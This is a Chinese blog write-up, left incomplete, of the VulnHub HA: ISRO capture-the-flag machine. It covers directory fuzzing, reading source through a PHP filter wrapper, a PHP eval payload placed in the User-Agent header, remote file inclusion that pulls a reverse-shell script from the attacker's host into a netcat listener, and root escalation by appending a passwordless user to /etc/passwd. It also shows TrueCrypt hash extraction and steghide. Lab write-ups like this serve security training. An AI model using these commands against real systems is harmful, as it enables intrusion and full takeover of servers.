ha:isro靶机 writeup(并不完整)

最新推荐文章于 2023-06-03 14:40:15 发布
最新推荐文章于 2023-06-03 14:40:15 发布
阅读量749 收藏
点赞数
分类专栏: 靶机/ctf 文章标签: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/id_null/article/details/102870798
版权

靶机地址: https://www.vulnhub.com/entry/ha-isro,376/

根据作者的提示,一共四个flag,主要测试枚举的能力,后面我才发现是枚举说的是社工。。。

  1. Aryabhata
  2. Bhaskara
  3. Mangalyaan
  4. Chandrayaan 2

0x01 遇事不决nmap

nmap扫描结果:

192.168.109.129

22 ssh

80 http

没有3306,也就是没开数据库,大概率找后台然后文件上传拿shell

0x02 敏感目录扫描

wfuzz配上字典来一发

index.html

connect.php

?.php //没啥用,其实就不是文件

/img 这个地方成功找到第一个flag,Aryabhata.jpg binwalk了一下,也没藏什么东西,先往后稍稍

/bhaskara.html 源代码的Footer位置,出现一个神秘的base64

<!-- Footer -->
<!--BHASKARA LAUNCH CODE: L2JoYXNrYXJh -->
<footer class="w3-container w3-padding-64 w3-center w3-opacity w3-light-grey w3-xlarge">
 <p class="w3-medium">Powered by <a href="https://hackingarticles.in" target="_blank">Hacking Articles</a></p>
</footer>
</body>
</html>

解码得到/bhaskara ,访问,出现一个下载文件 IDA打开发现是个二进制文件,file命令显示是个data文件,扔binwalk也没发现有什么隐藏信息,先放放

0x03 准备测试connect.php的位置

查了一下twitter的大佬们,从web入手,现在就是找后台或者接着测connect.php

php伪协议

connect.php?file=php://filter/read=convert.base64-encode/resource=connect.php

connect.php
<?php
   $file = $_GET['file'];
   if(isset($file))
   {
       include("$file");
   }
   else
   {
       include("index.php");
   }
?>
    
/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
isro:x:1000:1000:isro,,,:/home/isro:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
mysql:x:108:115:MySQL Server,,,:/nonexistent:/bin/false

查看apt的安装历史,发现装了unzip,mysql-client,mysql-server,php7.2,vsfftp,apache2,openssh-server,

去twitter看了一下大佬以前的文章,发现一个好玩的东西 LFI的Aache日志中毒,测一下试试

编写payload

GET /connect.php?file=connetc.php HTTP/1.1
Host: 192.168.109.129
User-Agent: Mozilla/5.0 <?php eval($_GET('a'))?> Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

/connect.php?file=/var/log/apt/history.log

很可惜,没有回显,估计没给访问的权限,放弃

 

0x04 测试Bin文件bhaskara

binwalkstrings命令都没有发现有用的东西,查看十六进制也没发现什么好玩的,根据服务器上apt安装的服务的确想不出来应该是什么文件

0x05 收集twitter信息

一个LFI的Aache日志中毒,一个用于Pentester的Linux: APT特权升级,一个Exploiting Wildcard for Privilege Escalation

很遗憾,并不是日志污染,还是年轻了,这就是个SSRF。。。

kali把自带的nginx打开,/etc/init.d/nginx start,防火墙80端口打开,然后扔一个php反弹shell脚本进/var/www/html目录,再访问靶机的connect.php

connect.php?file=http://192.168.109.128/reverse.php

kali来一个nc -lvvp 1145,摸到shell

 

然后 ls -al /etc/passwd会发现是可读权限,直接菜鸡提权术

echo "kui::0:0:::/bin/bash" >>/etc/passwd

进root目录下看看,发现final.txt,好吧,直接通关

 

想起前面还有个数据库,没想到直接一个mysql就进去了,密码都不用输,之后就是show databases,show tables,select * from flag完事。

 

0x06 逝去的bhaskara(没整完,配置起来有点麻烦)

file bhaskara查看,依旧是data数据,根据大佬的writeup,这个竟然需要解密,web不行密码学来凑(你不说谁懂这个啊)

这里用到一个曾经也辉煌过的加密方式,truecrypt,这个是14年之后就停止更新了,所以不知道很正常

大佬给出的解密方法

https://raw.githubusercontent.com/truongkma/ctf-tools/master/John/run/truecrypt2john.py

python true.py bhaskara > hashes
john hashes --show

#!/usr/bin/env python

# TrueCrypt volume importion to a format usable by John The Ripper
#
# Written by Alain Espinosa <alainesp at gmail.com> in 2012.  No copyright
# is claimed, and the software is hereby placed in the public domain.
# In case this attempt to disclaim copyright and place the software in the
# public domain is deemed null and void, then the software is
# Copyright (c) 2012 Alain Espinosa and it is hereby released to the
# general public under the following terms:
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted.
#
# There's ABSOLUTELY NO WARRANTY, express or implied.
#
# (This is a heavily cut-down "BSD license".)
#
# Ported to Python by Dhiru Kholia, in June of 2015

import sys
from os.path import basename
import binascii


def process_file(filename, keyfiles):

    try:
        f = open(filename, "rb")
    except Exception as e:
        sys.stderr.write("%s : No truecrypt volume found? %s\n" % str(e))
        return

    header = f.read(512)  # encrypted header of the volume
    if len(header) != 512:
        f.close()
        sys.stderr.write("%s : Truecrypt volume file to short: Need at least 512 bytes\n", filename)
        return

    for tag in ["truecrypt_RIPEMD_160", "truecrypt_SHA_512", "truecrypt_WHIRLPOOL"]:
        sys.stdout.write("%s:%s$" % (basename(filename), tag))
        sys.stdout.write(binascii.hexlify(header))
        if keyfiles:
            nkeyfiles = len(keyfiles)
            sys.stdout.write("$%d" % (nkeyfiles))
            for keyfile in keyfiles:
                sys.stdout.write("$%s" % keyfile)
        sys.stdout.write(":normal::::%s\n" % filename)

    # try hidden volume if any
    f.seek(65536, 0)
    if f.tell() != 65536:
        f.close()
        return
    header = f.read(512)
    if len(header) != 512:
        f.close()
        return

    for tag in ["truecrypt_RIPEMD_160", "truecrypt_SHA_512", "truecrypt_WHIRLPOOL"]:
        sys.stdout.write("%s:%s$" % (basename(filename), tag))
        sys.stdout.write(binascii.hexlify(header))
        if keyfiles:
            nkeyfiles = len(keyfiles)
            sys.stdout.write("$%d" % (nkeyfiles))
            for keyfile in keyfiles:
                sys.stdout.write("$%s" % keyfile)
        sys.stdout.write(":hidden::::%s\n" % filename)

    f.close()

if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.stderr.write("Error: No truecrypt volume file specified.\n")
        sys.stderr.write("\nUtility to import TrueCrypt volume to a format crackeable by John The Ripper\n")
        sys.stderr.write("\nUsage: %s volume_filename [keyfiles(s)]> output_file\n" % sys.argv[0])
        sys.exit(-1)

    keyfiles = []
    if len(sys.argv) > 2:
        keyfiles = sys.argv[2:]

    process_file(sys.argv[1], keyfiles)

好吧,没有字典似乎是整不动,而且有点过于麻烦(指针对web狗来,有兴趣的可以去大佬的writeup上看看)

0x07图片隐写

在img目录下有张跟周围完全不大的图片,下载下来,根据提示这个就是隐藏flag的地方了 binwalk来一个,没用。。。 根据作者的writeup,需要一个steghide,直接 apt-get install steghide就完事了 在跟一个steghide extract -sf aryabhata.jpg,完事 

等有空再把bhaskara的flag拿了吧(指摸了)

 

参考链接:

https://www.hackingarticles.in/ha-isro-vulnhub-walkthrough/

 

ku1P1n
关注
专栏目录
CTF之加密解密(HAISRO)
afei001
10-31 519
练习环境 攻击机:kali 靶机HAISRO 下载地址:https : //download.vulnhub.com/ha/isro.zip 1.发现靶机,端口扫描 root@afei:~# netdiscover -r 192.168.100.135 Currently scanning: 192.168.100.0/24 | Screen View: Unique Hosts ...
『VulnHub系列』HA: ISRO-Walkthrough
ins1ght的博客
10-23 924
靶机发布日期:2019年10月4日,这是一个CTF类型的靶机,共有4个flag。查看网页源代码得到提示,下载到一个TrueCrypt类型的文件,使用脚本以及john得到密码,最过VeraCrypt打开文件,得到flag;gobuster发现connect.php页面,随后通过该页面反弹shell,进入靶机后发现/etc/passwd可写,成功提权。
Vulnhub: HA: ISRO靶机
最新发布
qq_43884092的博客
06-03 74
远程文件包含执行命令,写入用户到/etc/passwd提权
Vulnhub靶机 Acid write up 命令执行反弹shell 分析pcapng包 得到登录密码 提权
YouthBelief的博客
12-05 601
Acid write up0x00 靶机搭建0x01 信息收集ip探测端口服务识别0x02 漏洞挖掘web思路步骤一:枚举目录,测试页面步骤二:保存图片到本地看看 0x00 靶机搭建 下载链接 https://download.vulnhub.com/acid/Acid.rar 靶机搭建 VM 启动 网卡设为nat 0x01 信息收集 ip探测 netdiscover -i eth0 -r 192.168.157.0/24 端口服务识别 masscan -p 1-65535 --ra
HA: Wordy靶机-Walkthrough
ins1ght的博客
10-04 1398
这个靶机可利用的漏洞挺多的,像LFI、RFI、文件上传、SQLi,我试着把这几个漏洞都复现了一遍,尽管并不是所有的漏洞都能getshell。最后提权的时候使用了SUID权限的wget,对,你没看错,是wget。除了vim、less、more、nano、cp、mv、find、bash以及nmap,现在又多了一个wget,意不意外,惊不惊喜?
ISRO.rar_isro
09-24
标题中的"ISRO.rar_isro"表明这是一份与印度空间研究组织(ISRO)相关的压缩文件,可能包含了关于该组织近期项目的详细信息。描述提到“About recent ISRO Projects”,暗示我们将深入探讨ISRO近期的一些重点任务和...
ISRO_AstroSat_9th_InterIIT_Tech_Meet:Inter IIT Tech满足2021年AstroSat准备声明
04-30
AstroSat是印度空间研究组织(ISRO)发射的一颗多波段天体物理学观测卫星,旨在研究宇宙中的多种天文现象。这颗卫星承载了多个科学仪器,包括紫外线、X射线和伽马射线望远镜,使得科学家能够同时在不同光谱段观测天体...
isroece_isro_ECE_zip_
10-04
ISRO preparation papers
ISRO-redisgn
05-09
标题“ISRO-redisgn”指的是印度空间研究组织(ISRO)的品牌重塑或网站重新设计项目。这个项目可能涉及到了ISRO在线形象的更新,旨在提供更好的用户体验和更现代的视觉效果。它采用了一系列Web技术,包括HTML、CSS和...
CTF 私钥泄漏 writeup
Kstheme的博客
08-13 844
工具 私钥泄漏靶机 kali linux虚拟机 操作步骤 第一步:先使用ip探测,探测网段中有哪些计算机在使用。探测方法是"netdiscover -r ip/netmask" 192.168.2.142是我们的靶机。 第二步:找出靶机ip地址后,我们使用nmap来探测它的开放服务。 我们发现有3个端口是开放的,这时我们再去查看服务中有没有隐藏信息。 第三步:打开Firefox,在网址栏中输...
CTF6靶机实战.zip
05-25
CTF6靶机实战包括三部分: 1)靶机实战过程 2)文件上传的反弹shell文件(shell.php) 3)系统版本漏洞需要的文件(8478.sh)
Vulnhub-Djinn靶机-Writeup
Vicl1fe的博客
12-03 1255
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 靶机网址: https://www.vulnhub.com/entry/djinn-1,397/ 靶机知识点: arp-scan nmap ftp nc dirsearch 命令执行 python2 input漏洞 主机发现 靶机是ova格式的,可以用Vmware导入,也可以用virtualbox打开。 使用...
谜团靶机writeup - 专项 · 文件上传
小龙人
01-09 798
涵盖极广的常见且实用的文件上传漏洞利用技巧,收集了渗透测试和CTF中遇到的各种上传漏洞,涵盖文件上传的所有基本的利用技巧,旨在帮助大家对上传漏洞有一个全面的了解。 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。 谜团靶机平台地址:https://mituan.zone/ 注册选择靶机 注册登录之后可以看到有很多靶机,选择本次的目标-文件上传。 遇到不符合常理的问题可以点清空上传文件试试。 图片马 gif格.
vulnhub靶机HA wordy渗透测试
Long_gone的博客
10-04 666
打开靶机后,先扫描一下靶机IP是多少: netdiscover 由经验推断出靶机IP为:192.168.34.224,然后使用使用nmap扫描一下靶机端口开放情况: nmap -sV -p 0-65535 192.168.34.224 发现有http端口开放,然后访问一下看看: 在页面并没有什么发现,然后我们先使用目录爆破一下看看: dirb http://192.168.34.224:...
Bulldog靶机-walkthrough
ins1ght的博客
09-05 1469
Bulldog靶机,一个CTF类型的靶机
18. CTF综合靶机渗透(十一)
weixin_30763397的博客
07-24 1062
靶机描述: SkyDog Con CTF 2016 - Catch Me If You Can 难度:初学者/中级 说明:CTF是虚拟机,在虚拟箱中工作效果最好。下载OVA文件打开虚拟框,然后选择文件->导入设备。从下载的地方选择OVA文件。在导入OVA文件之后,确保在启动VM之前禁用USB 2。默认情况下,只为主机设置适配器,但在启动之前,您可以根据网络设置改变这一点。虚拟机服务器配...
OWASP_VM_1.2靶机的下载与安装
热门推荐
冠霖L的博客
07-04 3万+
OWASP(Broken Web Applications Project),是一组易受攻击的Open Web应用程序安全项目,分布在VMware格式的虚拟机上,包含了当前几乎全部类型的漏洞,例如:SQL注入、XSS攻击等等。它是由一家非营利性组织——OWASP 基金会提供持续性支持,可免费下载与使用。 OWASP官网:https://www.owasp.org OWASP中国官网:http:...
Day1:了解学习资料&Matesploit靶机下载
Festinatione facit vastum
08-03 2924
Day1:了解学习资料以及资源下载这是一本2015年出版的信息安全相关书籍,但是内容会有些偏旧,因为书里Kali还是BT时代,第二人称的编写,让人代入感很强,便于学习。读者对象读者群主要包括:△ 网络与系统安全领域的技术爱好者与学生 △ 渗透测试、漏洞分析研究与网络安全管理方面的从业人员 △ 开设信息安全、网络安全与执法等相关专业的高等院校本科生及研究生 △ 期望在信息安全领域就业的技术人员 △ 想
DC1-靶机
Au
07-31 9514
环境搭建 DC系列目前总共有9个靶机,本次靶机是DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。 将下载的ova文件导入VMware Workstation15(低版本不支持导入ova文件) 配置网络为nat模式(你需要知道你的靶机的IP网段,最好与kali攻击机处于同一网段) 靶机开机后是一个登陆页面,无法得知ip 环境 kali:192.1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值